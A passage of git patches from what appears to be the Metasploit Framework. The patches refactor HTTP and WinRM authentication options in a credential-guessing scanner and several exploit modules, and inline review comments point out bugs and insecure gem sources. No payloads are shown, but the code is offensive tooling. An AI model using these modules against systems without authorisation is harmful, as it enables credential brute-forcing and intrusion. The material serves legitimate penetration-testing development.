:source_type => "user_supplied", :active => true ) 
@@ -188,142 +165,28 @@ def do_login(user='admin', pass='admin') end end - def do_http_login(user,pass,scheme) - case scheme - when /NTLM/i - do_http_auth_ntlm(user,pass) - when /Digest/i - do_http_auth_digest(user,pass,datastore['REQUESTTYPE']) - when /Basic/i - do_http_auth_basic(user,pass) - else - vprint_error("#{target_url}: Unknown authentication scheme") - return :abort - end - end - - def do_http_auth_ntlm(user,pass) + def do_http_login(user,pass) begin - resp = send_request_auth_negotiate( + response = send_request_cgi({ 'uri' => @uri, + 'method' => datastore['REQUESTTYPE'], 'username' => user, 'password' => pass - ) - return :abort if (resp.code == 404) - - if [200, 301, 302].include?(resp.code) - @proof = resp - return :success - end - + }) + return response rescue ::Rex::ConnectionError vprint_error("#{target_url} - Failed to connect to the web server") - return :abort + return nil end - - return :fail end - def do_http_auth_basic(user,pass) - user_pass = Rex::Text.encode_base64(user + ":" + pass) - - begin - res = send_request_cgi({ - 'uri' => @uri, - 'method' => 'GET', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - } - }, 25) - - unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") - return :abort - end - - return :abort if (res.code == 404) - - if [200, 301, 302].include?(res.code) - @proof = res - return :success - end - - rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") - return :abort - end - + def determine_result(response) + return :abort unless response.kind_of? 
Rex::Proto::Http::Response + return :abort unless response.code + return :success if [200, 301, 302].include?(response.code) return :fail end - def do_http_auth_digest(user,pass,requesttype) - path = datastore['AUTH_URI'] || "/" - begin - if requesttype == "PUT" - res= send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - 'data' => 'Test123\r\n', - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - elsif requesttype == "PROPFIND" - res = send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - 'data' => '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>', - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass, - 'headers' => { 'Depth' => '0'} - }, 25) - else - res= send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - end - - unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") - return :abort - end - - return :abort if (res.code == 404) - - if ( [200, 301, 302].include?(res.code) ) or (res.code == 201) - if ((res.code == 201) and (requesttype == "PUT")) - print_good("Trying to delete #{path}") - del_res = send_digest_request_cgi({ - 'uri' => path, - 'method' => 'DELETE', - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - if not (del_res.code == 204) - print_error("#{path} could be created, but not deleted again. This may have been noisy ...") - end - end - @proof = res - return :success - end - - if (res.code == 207) and (requesttype == "PROPFIND") - @proof = res - return :success - end - - rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") - return :abort - end - return :fail - end end From 8b1febb4cfc879706bc9cf4e700e048628bc954f Mon Sep 17 00:00:00 2001 
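Review bot: `determine_result` maps every status other than 200/301/302 to `:fail`, so a 404 no longer aborts the host as each removed helper did with `return :abort if (res.code == 404)`. The scan will now run the whole credential list against a URI that is not there. The removed digest path also accepted 201 for PUT and 207 for PROPFIND and issued a DELETE for the resource a successful PUT had created. `do_http_login` still sends the configured REQUESTTYPE but has none of that handling, so a successful PUT is reported as a failure and whatever it created stays on the server. At minimum add `return :abort if response.code == 404` before the success check, and restore the 201/207 cases together with the DELETE cleanup. `do_login` begins before this hunk.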
From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 12:32:43 -0600 Subject: [PATCH 268/421] add myself to the blame list for the module =P --- modules/auxiliary/scanner/http/http_login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index fcf69e28e0a2..076bb36d70f6 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -26,7 +26,7 @@ def initialize [ ], - 'Author' => [ 'hdm' ], + 'Author' => [ 'hdm' , 'thelightcosine'], 'References' => [ [ 'CVE', '1999-0502'] # Weak password From 090690e440be355692250a9f25e16ed87b60547e Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 4 Feb 2013 12:41:38 -0600 Subject: [PATCH 269/421] Add msgpack to gem deps --- Gemfile | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Gemfile b/Gemfile index 502e0060b3cc..376e177bfccc 100755 --- a/Gemfile +++ b/Gemfile @@ -5,6 +5,8 @@ gem 'activesupport', '>= 3.0.0' # Database models shared between framework and Pro. gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0' +gem 'msgpack' + group :development do # Markdown formatting for yard gem 'redcarpet' From 6a7cd3cac2f9f338e8e130d6c3f30a88bf79e247 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 4 Feb 2013 12:47:36 -0600 Subject: [PATCH 270/421] Add better deps to Gemfile Thanks, @bturner-r7 for tracking these down. --- Gemfile | 14 ++++++++++++-- 1 file changed, 12 insertions(+), 2 deletions(-) diff --git a/Gemfile b/Gemfile index 376e177bfccc..dcdea0185f3c 100755 --- a/Gemfile +++ b/Gemfile 
@@ -2,10 +2,20 @@ source 'http://rubygems.org' # Need 3+ for ActiveSupport::Concern gem 'activesupport', '>= 3.0.0' +# Needed for Msf::DbManager +gem 'activerecord' +# Needed for some admin modules (scrutinizer_add_user.rb) +gem 'json' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0' - +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0' +# Needed by msfgui and other rpc components gem 'msgpack' +# Needed by anemone crawler +gem 'nokogiri' +# Needed for module caching in Mdm::ModuleDetails +gem 'pg', '>= 0.11' +# Needed by anemone crawler +gem 'robots' group :development do # Markdown formatting for yard From d28557ddedec17d77cb103324bb189b1e2c0ba4d Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 4 Feb 2013 12:59:05 -0600 Subject: [PATCH 271/421] Merge branch 'master', remote-tracking branch 'origin/master' From 4c1e630bf36077d954bc2f448e26fdd51e201351 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 13:02:26 -0600 Subject: [PATCH 272/421] BasicAuth datastore cleanup cleanup all the old BasicAuth datastore options --- .../auxiliary/scanner/http/cisco_device_manager.rb | 4 ++-- modules/exploits/linux/http/piranha_passwd_exec.rb | 6 +++--- modules/exploits/multi/http/axis2_deployer.rb | 4 +--- modules/exploits/multi/http/jboss_bshdeployer.rb | 3 --- modules/exploits/multi/http/jboss_maindeployer.rb | 3 --- modules/exploits/multi/http/tomcat_mgr_deploy.rb | 14 ++++---------- .../exploits/unix/webapp/oracle_vm_agent_utl.rb | 3 --- modules/exploits/windows/http/easyftp_list.rb | 4 ++-- 8 files changed, 12 insertions(+), 29 deletions(-) diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index fd57fda9bbfe..9486262be789 100644 
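Review bot: The `metasploit_data_models` line added in this Gemfile hunk fetches over `git://`, which is neither encrypted nor authenticated, and the `source 'http://rubygems.org'` line shown on the hunk header has the same weakness, so anything on the network path could substitute gem code at install time. I would move both to HTTPS: `:git => 'https://github.com/rapid7/metasploit_data_models.git'` and `source 'https://rubygems.org'`. The newly added `activerecord`, `json`, `nokogiri` and `robots` entries carry no version constraint, so reproducible installs depend on a committed `Gemfile.lock`, which is not visible here.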
--- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -26,7 +26,7 @@ def initialize(info={}) 'Name' => 'Cisco Device HTTP Device Manager Access', 'Description' => %q{ This module gathers data from a Cisco device (router or switch) with the device manager - web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify + web interface exposed. The USERNAME and PASSWORD options can be used to specify authentication. }, 'Author' => [ 'hdm' ], @@ -61,7 +61,7 @@ def run_host(ip) print_good("#{rhost}:#{rport} Successfully authenticated to this device") # Report a vulnerability only if no password was specified - if datastore['BasicAuthPass'].to_s.length == 0 + if datastore['PASSWORD'].to_s.length == 0 report_vuln( { diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index d87027cadb50..4312fa2bd482 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -72,8 +72,8 @@ def initialize(info = {}) register_options( [ - OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']), - OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']), + OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'piranha']), + OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'q']), ], self.class) end @@ -96,7 +96,7 @@ def exploit end if res.code == 401 - print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!") + print_error("401 Authorization Required! Our credentials were not accepted!") elsif (res.code == 200 and res.body =~ /The passwords you supplied match/) print_status("Command successfully executed (according to the server).") end 
diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index 565d73a293c1..9f030bbbc2fe 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -227,9 +227,7 @@ def upload_exec(session,rpath) authmsg = res.headers['WWW-Authenticate'] end print_error("The remote server responded expecting authentication") - if datastore['BasicAuthUser'] and datastore['BasicAuthPass'] - print_error("BasicAuthUser \"%s\" failed to authenticate" % datastore['BasicAuthUser']) - elsif authmsg + if authmsg print_error("WWW-Authenticate: %s" % authmsg) end cleanup_instructions(rpath, name) # display cleanup info diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index 07d5eb2adaef..f350fe498483 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -96,9 +96,6 @@ def initialize(info = {}) def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 7c36c1fa1624..2297b5256928 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -123,9 +123,6 @@ def auto_target def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index a46cd2c033f5..2757cb6e1322 100644 
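Review bot: In the axis2_deployer.rb hunk the branch that reported rejected credentials is dropped rather than ported to the new option names, so a 401 with USERNAME and PASSWORD set now prints only the generic "expecting authentication" line and, if present, the WWW-Authenticate header. Keeping the distinction between "no credentials given" and "credentials refused" makes the output easier to act on: `print_error("USERNAME \"%s\" failed to authenticate" % datastore['USERNAME']) if datastore['USERNAME'].to_s != ''`. `upload_exec` starts and ends outside the hunk, and that this module registers USERNAME is assumed from the rest of the patch.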
--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -112,9 +112,6 @@ def initialize(info = {}) end def check - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - res = query_serverinfo disconnect return CheckCode::Unknown if res.nil? @@ -127,8 +124,8 @@ def check :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['BasicAuthUser'], - :pass => datastore['BasicAuthPass'], + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) @@ -164,9 +161,6 @@ def auto_target def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - mytarget = target if (target.name =~ /Automatic/) mytarget = auto_target @@ -221,8 +215,8 @@ def exploit :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['BasicAuthUser'], - :pass => datastore['BasicAuthPass'], + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index 9865c8716bd4..3bfd6c668e18 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -67,9 +67,6 @@ def initialize(info = {}) end def go(command) - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - xml = <<-EOS <?xml version="1.0"?> <methodCall> diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index 3484cdf86f47..c337ecdeee63 100644 --- a/modules/exploits/windows/http/easyftp_list.rb 
+++ b/modules/exploits/windows/http/easyftp_list.rb @@ -72,8 +72,8 @@ def initialize(info = {}) register_options( [ Opt::RPORT(8080), - OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), - OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), + OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), + OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), ], self.class) end From 0c57026065203ccab0cad3f7e06c4b278f066fba Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 13:13:08 -0600 Subject: [PATCH 273/421] Remove junk added earlier i added junk to tasos' class when we were going to attempt this a different way. housekeeping to clean it up --- lib/msf/core/auxiliary/web/http.rb | 17 ----------------- 1 file changed, 17 deletions(-) diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 0f88517176cb..407dfbd8285c 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb 
@@ -148,23 +148,6 @@ def request( url, opts = {} ) while rlimit >= 0 rlimit -= 1 res = _request( url, opts ) - if res.code == 401 and res.headers['WWW-Authenticate'] and opts['username'] - if res.headers['WWW-Authenticate'].include? 'Basic' - opts['password']||= '' - opts['basic_auth'] = opts['username'] + ":" + opts['password'] - res = _request( url, opts ) - elsif res.headers['WWW-Authenticate'].include? 'Digest' - opts['DigestAuthUser'] = opts['username'] - opts['DigestAuthPassword'] = opts['password'] - res = send_digest_request_cgi(opts,timeout) - elsif res.headers['WWW-Authenticate'].include? "Negotiate" - opts['provider'] = 'Negotiate' - res = send_request_auth_negotiate(opts,timeout) - elsif res.headers['WWW-Authenticate'].include? "NTLM" - opts['provider'] = 'NTLM' - res = send_request_auth_negotiate(opts,timeout) - end - end return res if !opts[:follow_redirect] || !url = res.headers['location'] end nil From 413c37e5068902e362c80d3d773b12748c22046d Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 13:39:40 -0600 Subject: [PATCH 274/421] Add invisible auth to Web::HTTP add the invisible auth support to tasos' http class --- lib/msf/core/auxiliary/web/http.rb | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 407dfbd8285c..6690f075fd10 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -70,6 +70,7 @@ def timed_out attr_reader :framework attr_accessor :redirect_limit + attr_accessor :username , :password def initialize( opts = {} ) @opts = opts.dup 
@@ -85,8 +86,8 @@ def initialize( opts = {} ) @request_opts = {} if opts[:auth].is_a? Hash - @request_opts['basic_auth'] = [ opts[:auth][:user].to_s + ':' + - opts[:auth][:password] ]. pack( 'm*' ).gsub( /\s+/, '' ) + @username = opts[:auth][:user].to_s + @password = opts[:auth][:password].to_s end self.redirect_limit = opts[:redirect_limit] || 20 @@ -106,7 +107,9 @@ def connect opts[:target].port, {}, opts[:target].ssl, - 'SSLv23' + 'SSLv23', + username, + password ) c.set_config({ @@ -294,6 +297,10 @@ def _request( url, opts = {} ) opts['data'] = body if body c = connect + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout ) rescue ::Timeout::Error Response.timed_out From 9b84e5b3c421bb5e3943a20af985cec4325e3c78 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 13:59:58 -0600 Subject: [PATCH 275/421] Fix raw requests to work as well as cgi --- lib/rex/proto/http/client.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 725f451b4253..9d019ebac86d 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -201,8 +201,8 @@ def request_raw(opts={}) req << set_extra_headers(c_head) req << set_raw_headers(c_rawh) req << set_body(c_body) - - req + + {:string => req , :opts => opts} end From c71b803413a36c9d3b14a4bb0f98ba16e8651030 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 14:38:08 -0600 Subject: [PATCH 276/421] Add invisible auth to web crawler the anemone web crawler now properly supports our invisible auth scheme for rex http. --- lib/anemone/rex_http.rb | 4 +++- lib/msf/core/auxiliary/crawler.rb | 16 ++++++++-------- 2 files changed, 11 insertions(+), 9 deletions(-) 
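Review bot: `request_raw` in lib/rex/proto/http/client.rb now returns `{:string => req , :opts => opts}` instead of the request String, which changes the contract for any caller that writes the result to a socket or calls String methods on it; those callers are outside this hunk and need checking. The returned `opts` may carry credential keys when callers supply them, so the Hash should not end up in debug output via `inspect`. A comment above the return would make the new shape explicit: `# Returns a Hash: :string is the serialized request, :opts the options it was built from (may contain credentials)`. The method body begins outside the hunk.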
diff --git a/lib/anemone/rex_http.rb b/lib/anemone/rex_http.rb index ce6a71a17ff7..f606f289fc27 100644 --- a/lib/anemone/rex_http.rb +++ b/lib/anemone/rex_http.rb @@ -188,7 +188,9 @@ def connection(url) context, url.scheme == "https", 'SSLv23', - @opts[:proxies] + @opts[:proxies], + @opts[:username], + @opts[:password] ) conn.set_config( diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb index 36e963ecbc8f..86792381ed24 100644 --- a/lib/msf/core/auxiliary/crawler.rb +++ b/lib/msf/core/auxiliary/crawler.rb @@ -22,7 +22,9 @@ def initialize(info = {}) Opt::Proxies, OptInt.new('MAX_PAGES', [ true, 'The maximum number of pages to crawl per URL', 500]), OptInt.new('MAX_MINUTES', [ true, 'The maximum number of minutes to spend on each URL', 5]), - OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]) + OptInt.new('MAX_THREADS', [ true, 'The maximum number of concurrent requests', 4]), + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication']) ], self.class ) @@ -34,8 +36,6 @@ def initialize(info = {}) OptString.new('UserAgent', [true, 'The User-Agent header to use for all requests', "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" ]), - OptString.new('BasicAuthUser', [false, 'The HTTP username to specify for basic authentication']), - OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), OptString.new('HTTPAdditionalHeaders', [false, "A list of additional headers to send (separated by \\x01)"]), OptString.new('HTTPCookie', [false, "A HTTP cookie header to send with each request"]), OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]), 
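Review bot: The `connection(url)` hunk in lib/anemone/rex_http.rb hands `@opts[:username]` and `@opts[:password]` to the client built for whatever `url` is being fetched, with no check that the host is the one the credentials were configured for. If the crawler follows a link or redirect to a different host (the scoping logic is not visible in this hunk), that host would receive the credentials simply by answering with an authentication challenge, and over plain `http` a Basic exchange puts them on the wire in recoverable form. I would pass them only when the URL's scheme, host and port match the configured target, and pass `nil` otherwise. `connection` starts and ends outside the hunk.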
@@ -118,8 +118,9 @@ def run :info => "" }) - if datastore['BasicAuthUser'] - t[:http_basic_auth] = [ "#{datastore['BasicAuthUser']}:#{datastore['BasicAuthPass']}" ].pack("m*").gsub(/\s+/, '') + if datastore['USERNAME'] and datastore['USERNAME'] != '' + t[:username] = datastore['USERNAME'].to_s + t[:password] = datastore['PASSWORD'].to_s end if datastore['HTTPCookie'] @@ -278,9 +279,8 @@ def crawler_options(t) opts[:cookies] = t[:cookies] end - if t[:http_basic_auth] - opts[:http_basic_auth] = t[:http_basic_auth] - end + opts[:username] = t[:username] || '' + opts[:password] =t[:password] || '' opts end From 39cafd0cdeaf949b85f4d2a6a6881ff61238ca09 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 4 Feb 2013 15:08:34 -0600 Subject: [PATCH 277/421] Use OptEnum instead of OptString --- modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index 7df91ce0636f..8eb9e1ce59e8 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb @@ -33,7 +33,7 @@ def initialize(info={}) register_options([ OptString.new('URIPATH', [true, "The URI to test", "/"]), - OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ]), ], self.class) end From b793579f5e38b1319b2a5e51f653089376af2c13 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 4 Feb 2013 15:12:31 -0600 Subject: [PATCH 278/421] Fix silly revert of MDM version --- Gemfile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile b/Gemfile index dcdea0185f3c..fc720a23b7a5 100755 --- a/Gemfile +++ b/Gemfile 
@@ -7,7 +7,7 @@ gem 'activerecord' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0' +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0' # Needed by msfgui and other rpc components gem 'msgpack' # Needed by anemone crawler From 9b30e354eaaa837ce63492e16f73885d6c11e38c Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 4 Feb 2013 15:32:36 -0600 Subject: [PATCH 279/421] Updates HTTP_METHOD option to use OptEnum. --- modules/exploits/multi/http/rails_json_yaml_code_exec.rb | 3 +-- modules/exploits/multi/http/rails_xml_yaml_code_exec.rb | 3 +-- 2 files changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index 4066d047fef5..6fafba24d9de 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -55,8 +55,7 @@ def initialize(info = {}) [ Opt::RPORT(80), OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), - OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) - + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ]) ], self.class) end diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb index 8743f76106cd..e5e5311505bc 100644 --- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb 
@@ -53,8 +53,7 @@ def initialize(info = {}) [ Opt::RPORT(80), OptString.new('URIPATH', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), - OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) - + OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ]) ], self.class) register_evasion_options( From 44d4e298dcca40225ede5538bf9c46e7066fb97f Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 4 Feb 2013 15:48:31 -0600 Subject: [PATCH 280/421] Attempting to cleanup winrm auth --- lib/msf/core/exploit/winrm.rb | 118 ++++-------------- .../auxiliary/scanner/winrm/winrm_login.rb | 2 +- modules/auxiliary/scanner/winrm/winrm_wql.rb | 2 +- .../windows/winrm/winrm_script_exec.rb | 24 +--- 4 files changed, 29 insertions(+), 117 deletions(-) diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb index 72b6a1f7242d..3eb7fae2ca00 100644 --- a/lib/msf/core/exploit/winrm.rb +++ b/lib/msf/core/exploit/winrm.rb @@ -42,7 +42,7 @@ def winrm_poke(timeout = 20) c = connect(opts) to = opts[:timeout] || timeout ctype = "application/soap+xml;charset=UTF-8" - resp, c = send_request_cgi(opts.merge({ + resp, c = send_winrm_request(opts.merge({ 'uri' => opts['uri'], 'method' => 'POST', 'ctype' => ctype, @@ -61,7 +61,7 @@ def parse_auth_methods(resp) end def winrm_run_cmd(cmd, timeout=20) - resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) + resp = send_winrm_request(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil 
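Review bot: In `winrm_poke` the call becomes `send_winrm_request(opts.merge({...}))`, but `send_winrm_request(data, timeout=20)` as added further down in this patch treats its first argument as the request body and builds its own options around it, so the merged options Hash ends up as `'data'` and the `uri`, `method` and `ctype` given here are ignored. The helper also attaches `datastore['USERNAME']` and `datastore['PASSWORD']`, which turns what was an unauthenticated probe feeding `parse_auth_methods` into a request that carries credentials. Keeping the original call looks like the intended behaviour: `resp, c = send_request_cgi(opts.merge({`. The end of the `winrm_poke` body lies outside the hunk.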
@@ -76,17 +76,17 @@ def winrm_run_cmd(cmd, timeout=20) return retval end shell_id = winrm_get_shell_id(resp) - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) - resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) - resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id)) + resp = send_winrm_request(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_delete_shell_msg(shell_id)) return streams end def winrm_run_cmd_hanging(cmd, timeout=20) - resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) + resp = send_winrm_request(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil @@ -101,9 +101,9 @@ def winrm_run_cmd_hanging(cmd, timeout=20) return retval end shell_id = winrm_get_shell_id(resp) - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) return streams end 
